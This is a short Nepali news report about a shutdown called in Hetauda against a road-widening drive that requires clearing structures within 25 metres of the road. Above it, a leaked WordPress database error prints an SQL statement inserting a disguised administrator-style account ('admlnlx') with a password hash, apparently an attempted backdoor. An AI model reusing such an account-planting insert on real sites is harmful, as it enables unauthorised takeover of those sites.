WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B7fzM7N6.nPMQH9vdo.44UQFuWRweN1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 08:54:09', '', 'admlnlx', 'admlnlx')
हेटौडा,माघ ४-
डिभिजन सडक कार्यालय हेटौँडाले मंगलबारबाट बजार क्षेत्रमा सडक विस्तार अभियान सुरु गर्ने बताएपछि त्यसको विरोधमा स्थानीयले हेटौँडा बन्द आह्वान गरेका छन्। सडकको २५ मिटर क्षेत्रभित्र पर्ने सम्पूर्ण संरचना हटाउन दिएको समयसिमा सकिएपछि मंगबारबाट सडक विस्तार अभियान सुरु गर्ने तयारी भइरहँदा बसोबास संरक्षण समिति हेटौँडाले बन्दको आह्वान गरेको हो। डिभिजन सडक कार्यालयले राप्तिपुलबाट सडक फराकिलो पार्ने काम सुरु गर्ने जनाएको छ।
स्थानीयको प्रर्दशन, विरोधसभा तथा बन्दको बावजुत पनि डोजर चलाउन लागेपछि त्यसको प्रतिरोध गर्न बन्द आह्वान गरिएको समितिका अध्यक्ष राजकुमार न्यौपानेले बताए। यता डिभिजन सडक कार्यालय हेटौँडाले भने सडक विस्तार अभियान कुनै हालतमा रोक्न नमिल्ने जिकिर गरेको छ। आफूहरुले सम्पूर्ण तयारी गरिसकेकाले अभियान नरोकिने प्रवक्ता जयराम अधिकारीले बताए। स्थानीयले सोमबार पनि बजार बन्द गराएका थिए।